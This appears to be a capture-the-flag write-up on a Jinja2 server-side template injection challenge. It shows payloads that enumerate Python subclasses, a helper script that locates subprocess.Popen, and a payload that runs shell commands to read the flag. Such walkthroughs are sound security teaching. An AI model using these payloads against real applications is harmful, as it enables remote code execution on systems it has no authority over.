Description

Super secure technology infrastructure, A fortress built with digital flair, Encrypted and protected, no intrusion allowed, Our data safe from any dare. Poem by ChatGPT

By the challenge title, we can identify that it is a Server Side Template Injection vulnerability.

First, we will need to identify the templating engine used, and we can refer to this chart below.

After playing with the input, we can identify that it is running Jinja2. We can also refer the the hacktricks guide to identify the templating engine.

Referring to the Jinja2 SSTI guide, we are able to perform remote code execution and get the flag!

First, we will need to identify the <class 'subprocess.Popen'> offset. We can find it using the payload below to list all the subclasses

{{''.__class__.__mro__[1].__subclasses__()}}

Very handy script to find the offset

data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
data = data.split(', ')

id = []
for i,d in enumerate(data):
    if 'subprocess' in d:
        print("Found in index:",i)
        id.append(i)

for i in id:
        print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")

After finding <class 'subprocess.Popen'> we can then utilize it to perform RCE.

{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}

References

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2